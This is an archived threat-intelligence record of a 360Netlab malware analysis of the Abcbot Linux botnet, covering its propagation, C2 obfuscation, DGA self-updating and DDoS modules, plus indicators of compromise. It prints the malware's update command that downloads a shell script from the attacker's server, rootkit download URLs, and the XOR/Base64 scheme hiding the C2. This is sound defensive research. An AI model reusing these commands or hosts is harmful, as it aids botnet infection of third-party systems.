{
	"id": "9b09a212-2914-4313-a1fb-26dd142b6e8e",
	"created_at": "2026-04-06T00:06:44.646574Z",
	"updated_at": "2026-04-10T03:20:42.248Z",
	"deleted_at": null,
	"sha1_hash": "9dee0bc88610e4fbd0b130395eb2374b9ea824d2",
	"title": "Abcbot, an evolving botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1169438,
	"plain_text": "Abcbot, an evolving botnet\r\nBy Alex.Turing\r\nPublished: 2021-11-09 · Archived: 2026-04-05 20:05:50 UTC\r\nBackground\r\nBusiness on the cloud and security on the cloud is one of the industry trends in recent years. 360Netlab is also\r\ncontinuing to focus on security incidents and trends on the cloud from its own expertise in the technology field.\r\nThe following is a recent security incident we observed, where the infected device IP came from multiple cloud\r\nprovider platforms.\r\nOn July 14, 2021, our BotMon system identified an unknown ELF file (a14d0188e2646d236173b230c59037c7)\r\ngenerating a lot of scanning traffic, after analysis, we determined that this is a Go language implementation of\r\nScanner, based on its source path \"abc-hello\" string, we named it Abcbot internally.\r\nAt the beginning, Abcbot was relatively simple, and could be seen as a scanner for attacking Linux systems, with\r\na weak password \u0026 Nday vulnerability for worm-like propagation. One interesting thing is that Abcbot's source\r\npath has the \"dga.go\" string, but no related DGA implementation was found . We assumed that its authors would\r\nadd this feature in subsequent versions, other than that, we did not paid too much attention to it.\r\nAs time passed, Abcbot has continued to evolve, and as we expected, it added the DGA feature in\r\nsubsequent samples . 
Today Abcbot has the ability to self-update, set up a webserver, launch DDoS attacks, and propagate like a worm.\r\nOn October 8, 2021, Trend Micro released an analysis of this family, which focused on the pre-SHELL scripts that spread Abcbot, but skimmed over the features of Abcbot itself.\r\nGiven that Abcbot is under continuous development and its features are constantly being updated, we decided to write this article to share our findings with the community.\r\nTimeline\r\nOn July 14, 2021, abcbot was first captured, with the main functionality of Scanner and WebServer.\r\nJuly 22, 2021, abcbot updated to include DGA-related code in the self-updating function.\r\nOctober 10, 2021, abcbot performed a minor update.\r\nOctober 12, 2021, another update, with some major code structure changes.\r\nOctober 21, 2021, another update, adding the open source ATK rootkit to support DDoS functionality.\r\nhttps://blog.netlab.360.com/abcbot_an_evolving_botnet_en/\r\nPage 1 of 16\n\nOctober 30, 2021, another update, abandoning the ATK rootkit in favour of their own implementation of DDoS functionality.\r\nAbcbot Overview\r\nWe use the latest October 30, 2021 sample as a blueprint. This version mainly targets common databases and WEB servers, uses weak passwords \u0026 Nday vulnerabilities to achieve worm-like propagation, and its main focus is DDoS.\r\nIt currently supports the following nine attack methods.\r\ntls Attack\r\ntcp Attack\r\nudp Attack\r\nace Attack\r\nhulk Attack\r\nhttpGet Attack\r\ngoldenEye Attack\r\nslowloris Attack\r\nbandwidthDrain Attack\r\nIts basic flow chart is shown below.\r\nSample Analysis\r\nWe captured a total of 6 different versions of abcbot samples, and the sample of October 30 was selected as the main object of analysis in this paper; its basic information is shown as follows.\r\nMD5:ae8f8cf967ca15a7689f2d1f79fbc5dc\r\nELF 64-bit LSB executable, x86-64, 
version 1 (SYSV), statically linked, stripped\r\nPacker:upx\r\nDate:2021-10-30\r\nAbcbot uses a standard UPX shell. When it runs on the compromised device, Abcbot confuses the user by copying itself into the following files, then starting the dockerlogger and iptablesupdate processes.\r\n/bin/dockerlogger\r\n/usr/bin/dockerlogger\r\n/etc/iptablesupdate\r\nThe iptablesupdate process is responsible for scanning for new devices to infect, reporting the device information to C2, and waiting for the execution of DDoS commands issued by C2.\r\nThe dockerlogger process is responsible for turning the infected device into a webserver, reporting the device information to C2, and waiting for the execution of the Updata command issued by the update server. Let's take a closer look.\r\n0x01: Uploading device information to C2\r\nThe current Abcbot samples are hard-coded with an encrypted C2 string (\"GEVQYYdjQdquLemMLYlkLLXLQmq7NmL7NYXu\"), which is encoded using Base64 \u0026 XOR encryption.\r\nThe Base64 decoding operation is shown below, and it can be seen that Abcbot changes the Base64 alphabet, using LMNu67PQX21pqrR3YZaDEFGbcVIJjkKWdefstghiBACHlSTUmO5noxyz04vw89+/\r\nBy XORing the Base64 decoded result with the key bytes 0x31 0x32 0x33, the following final result can be obtained:\r\nhttp://103.209.103.16:26800\r\nAfter decrypting C2, both the iptablesupdate and dockerlogger processes report device information to C2 via the path \"/api/postip\", and the format of the device information is OS:%v\\x09CPU:%v\\x09HX:%vh\\x09os-name:%v\\x09lanip:%v .\r\nNote that both processes collect the same device information and call the abc_hello_util_Os_pz function. 
The only difference is shown in the figure below, which shows that the dockerlogger process appends \"\\td0.02\" to the reported information, while iptablesupdate appends \"\\ti0.02\", where the \"d\" and \"i\" characters indicate which process is reporting, and \"0.02\" looks like a version number (in the October 21 sample, the version is \"0.01\").\r\nThe actual traffic generated is shown below.\r\n0x02: Scan and propagation\r\nThe \"abc_hello_plugin_StartScan\" function is responsible for infecting new devices. Its logic is to generate random IPs, detect whether the attackable ports on those IPs are open, and then attack the services by either going through the corresponding weak password list or using the Nday vulnerabilities.\r\nThe following code snippet shows that Abcbot tries to attack Weblogic.\r\nIn the Abcbot sample, you can clearly see the functions used in the attacks on the relevant network services.\r\nThe weak passwords and vulnerabilities used by Abcbot are the following:\r\nSSH weak password\r\nFTP weak password\r\nPostgreSQL weak password\r\nRedis weak password\r\nMssql weak password\r\nMongo weak password\r\nWebLogic Vulnerability (CVE-2020-14882)\r\n0x03: WebServer\r\nAbcbot uses the \"abc_hello_web_StartServer\" function to start a WebServer on the infected device, listening on port 26800; the supported methods and paths are shown in the following table.\r\nMethod Path\r\nPOST /api/postip\r\nPOST /api/configlist\r\nPOST /api/getlist\r\nPOST /api/check\r\nThe actual effect is shown in the following figure.\r\nAt present, the only path that is really called is \"/api/check\", which is used to determine whether the device has already been infected by requesting the target 
ip:26800/api/check during the scanning and propagation process.\r\nThe other paths are only used to maintain connectivity and have no real use. When they are accessed, some log files will be generated in the path \"/tmp.abchello\".\r\nIn fact, using a \"curl -X POST\" command to test C2, you can find that the above 4 paths also exist on C2. The author of Abcbot seems to want to break the current C/S network model and bring the role of the Bot in the network closer to that of a Server. Therefore, we speculate that the network structure of Abcbot may shift to P2P.\r\n0x04: Self-updating\r\nOn July 22, Abcbot introduced the \"abc_hello_util_Updata\" function to handle self-updates. Its logic is to request the \"2.txt\" resource from the remote server. The \"2.txt\" consists of two parts, in the format \"Resource(hex format)|digital signature(hex format)\". When the Bot successfully pulls the 2.txt, it verifies the digital signature with the following code snippet.\r\nThe hard-coded public key in the sample is\r\n-----BEGIN RSA PUBLIC KEY-----\r\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL3zj6XQt7gYe+L6oI/IUvlJNZVsg/JX\\x0AC7TCnl9p1JfBJFdx+W9FTFnO2Fr8/hAUtf1NpP/WG2fg\r\n-----END RSA PUBLIC KEY-----\r\nAfter the verification succeeds, the Resource is further decomposed; the format of the Resource is \"cmd|downloader url|crc32|cmd2\".\r\nWhen the cmd is \"alldown2\", the downloader url is requested and the crc32 hash value of the file is verified. The downloaded file completes the process of self-updating.\r\nThe actual 2.txt obtained is shown below.\r\nThe Resource part, decoded from HEX format, is the following update command.\r\nalldown2|http://103.209.103.16:26800/ff.sh|611043B5|posterrorurl\r\nThere are 3 sources for the remote server domain name in this process, as follows.\r\n1. 
Hard-coded TOR domain name (the decryption method is the same as for C2)\r\n2. DGA algorithm generates prefix strings, which are joined with 3 suffixes (.com, .tk, .pages.dev) to form the domain name\r\n3. DGA algorithm generates a string used as a github account name, and then gets the upgrade resources from this github account\r\nThe code snippet below is the process of Abcbot requesting 2.txt resources from the DGA generated domain name and GITHUB repository.\r\nThe domain names used for the samples at each time point are shown below.\r\nDate MD5 Res Tor Domain DGA Domain DGA Github\r\n07-14 a14d0188e2646d236173b230c59037c7 0 0 0\r\n07-22 e535215fad2ef0885e03ba111bd36e24 1 3/month 1/month\r\n10-10 6e66456ffb457c52950cf05a6aaabe4a 1 3/month 0\r\n10-12 39d373434c947742168e07cc9010c992 1 3/month 0\r\n10-21 e95c9bae6e2b44c6f9b98e2dfd769675 0 27/month 0\r\n10-30 ae8f8cf967ca15a7689f2d1f79fbc5dc 0 27/month 0\r\nPart of the DGA-generated domain names for Abcbot in October are shown below.\r\ndgixyyfug.tk\r\ndgixyyfug.com\r\ndgixyyfug.pages.dev\r\nguyfixdyg.tk\r\nguyfixdyg.com\r\nguyfixdyg.pages.dev\r\nWhen Abcbot started to use DGA to generate domain names for its update servers, we grabbed some of them at the first opportunity, which allowed us to measure its size. From the current statistics Abcbot is not very large, with a total of 261 IPs.\r\nThe current distribution of infected hosts by service providers is shown below.\r\n0x05: DDoS\r\nOn October 21, Abcbot introduced the \"main_TimeDDos\" function to support DDoS attacks. Its logic is to request DDoS instructions from C2 via the path \"/api/getlist\"; the instructions consist of 2 parts, \"DDoS instruction (hex format) | instruction digital signature (hex format)\". 
When the Bot receives the instruction, it reuses the digital signature verification from the self-updating subsection above, and can only execute the instruction after the verification succeeds.\r\nThe actual traffic generated is shown below; the \"73746f70\" string before the \"|\" character is the \"stop\" instruction.\r\nAn interesting thing is that the sample of October 21 (md5:e95c9bae6e2b44c6f9b98e2dfd769675) uses the open source ATK Rootkit to implement the DDoS function.\r\nAbcbot modified the main function in the ATK source code file share_atk_svr.c, and implemented a UDP server listening on SERV_PORT on 127.0.0.1 through the following code. SERV_PORT has 4 values, namely 88, 89, 90 and 91.\r\nsockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\nbzero(\u0026servaddr, sizeof(servaddr));\r\nservaddr.sin_family = AF_INET;\r\n// servaddr.sin_addr.s_addr = htonl(INADDR_ANY); // 0.0.0.0\r\nservaddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\r\nservaddr.sin_port = htons(SERV_PORT);\r\nWhen Abcbot receives the command sent by C2, it forwards the command to the UDP server, and the ATK rootkit performs the DDoS attack. 
The code snippet shown below is exactly the DDoS command \"BigUdp\" being forwarded to the rootkit.\r\nThe supported commands are shown below.\r\nstop\r\nsyn\r\ndns\r\nbigudp\r\nWe do not consider this approach to DDoS attacks a good one, as the ATK rootkit is stored in the form of source code on a remote server,\r\nxl_x64scan1=\"http://103.209.103.16:26800/atk.tar.gz\"\r\nxl_x64scan2=\"http://103.209.103.16:26800/atk.tar.gz\"\r\nwhich requires Abcbot to download the source code, compile it, and load the rootkit module before performing a DDoS attack. This process requires too many steps, and any step that fails will result in the failure of the DDoS function.\r\nApparently the author had the same thoughts, and in the October 30 sample (md5:ae8f8cf967ca15a7689f2d1f79fbc5dc) an update abandoned the ATK rootkit and implemented its own attack module, with nine attack methods being supported.\r\nSummary\r\nIn the process of reverse analysis, we found many oddities in Abcbot, such as \"repeatedly reporting local device information, not registering DGA domain names, unreasonable exclusion of TOR \u0026 Github resource servers, and webserver functionality not really enabled\", which gives us the feeling that the Abcbot authors are testing various technologies. The update process in these six months is not so much a continuous upgrade of features as a trade-off between different technologies. Abcbot is slowly moving from infancy to maturity. 
We do not consider this stage to be the final form; there are obviously many areas of improvement or features to be developed at this stage. Let's wait and see what happens.\r\nReaders are always welcome to reach us on Twitter or email us at netlab at 360 dot cn.\r\nIOC\r\nC2 \u0026 Resource Server\r\nDGA Domain(October)\r\ndgixyyfug.tk\r\ndgixyyfug.com\r\ndgixyyfug.pages.dev\r\nguyfixdyg.tk\r\nguyfixdyg.com\r\nguyfixdyg.pages.dev\r\ngfgiudyyx.tk\r\ngfgiudyyx.com\r\ngfgiudyyx.pages.dev\r\nxgudyfyig.tk\r\nxgudyfyig.com\r\nxgudyfyig.pages.dev\r\nyugxdigfy.tk\r\nyugxdigfy.com\r\nyugxdigfy.pages.dev\r\ngdgiyyfxu.tk\r\ngdgiyyfxu.com\r\ngdgiyyfxu.pages.dev\r\ngdiuyyfgx.tk\r\ngdiuyyfgx.com\r\ngdiuyyfgx.pages.dev\r\nfgiudxyyg.tk\r\nfgiudxyyg.com\r\nfgiudxyyg.pages.dev\r\nygfydgxui.tk\r\nygfydgxui.com\r\nygfydgxui.pages.dev\r\nDGA Domain(November)\r\nenjuyzkpr.tk\r\nenjuyzkpr.com\r\nenjuyzkpr.pages.dev\r\nrpzkjueyn.tk\r\nrpzkjueyn.com\r\nrpzkjueyn.pages.dev\r\nnkrjpezyu.tk\r\nnkrjpezyu.com\r\nnkrjpezyu.pages.dev\r\nunpeykzjr.tk\r\nunpeykzjr.com\r\nunpeykzjr.pages.dev\r\nypnuejrkz.tk\r\nypnuejrkz.com\r\nypnuejrkz.pages.dev\r\nnerjyzkup.tk\r\nnerjyzkup.com\r\nnerjyzkup.pages.dev\r\nnejpzykru.tk\r\nnejpzykru.com\r\nnejpzykru.pages.dev\r\nknjpeuzyr.tk\r\nknjpeuzyr.com\r\nknjpeuzyr.pages.dev\r\nzrkyenupj.tk\r\nzrkyenupj.com\r\nzrkyenupj.pages.dev\r\nIP\r\n103.209.103.16 China|Hong_Kong|Unknown AS63916|IPTELECOM_Global\r\nTor\r\nhttp://vgnaovx6prvmvoeabk5bxfummn3ltdur3h4ilnklvaox4lge2rp4nzqd.onion\r\nSample 
MD5\r\n0786c80bfcedb7da9c2d5edbe9ff662f\r\n0f2619811ceaf85baa72f9c8f876a59a\r\n1177c135f15951418219a97b3caad4e1\r\n1a720cc74ecf330b8f13412de4d5646b\r\n39d373434c947742168e07cc9010c992\r\n3f277c7b4c427f9ef02cf8df4dd7be44\r\n5d37a61451e5cfdeca272369ac032076\r\n6e66456ffb457c52950cf05a6aaabe4a\r\n89ffd4f612ce604457446ee2a218de67\r\n8f3558b29d594d33e69cea130f054717\r\na14d0188e2646d236173b230c59037c7\r\na17ea52318baa4e50e4b6d3a79fbd935\r\na4c7917787dc28429839c7d588956202\r\nae8f8cf967ca15a7689f2d1f79fbc5dc\r\nbaeb11c659b8e38ea3f01ad075e9df9a\r\nc27d1c81a3c45776e31cfb384787c674\r\nc64fbc7d3586d42583aa3a0dc3ea529f\r\ne535215fad2ef0885e03ba111bd36e24\r\ne95c9bae6e2b44c6f9b98e2dfd769675\r\nDownloader\r\nhttp://103[.209.103.16:26800/atk.tar.gz\r\nhttp://103[.209.103.16:26800/dd.sh\r\nhttp://103[.209.103.16:26800/ff.sh\r\nhttp://103[.209.103.16:26800/linux64-shell\r\nhttp://103[.209.103.16:26800/xlinux\r\nSource: https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/"
	],
	"report_names": [
		"abcbot_an_evolving_botnet_en"
	],
	"threat_actors": [],
	"ts_created_at": 1775434004,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.pdf",
		"text": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.txt",
		"img": "https://archive.orkl.eu/9dee0bc88610e4fbd0b130395eb2374b9ea824d2.jpg"
	}
}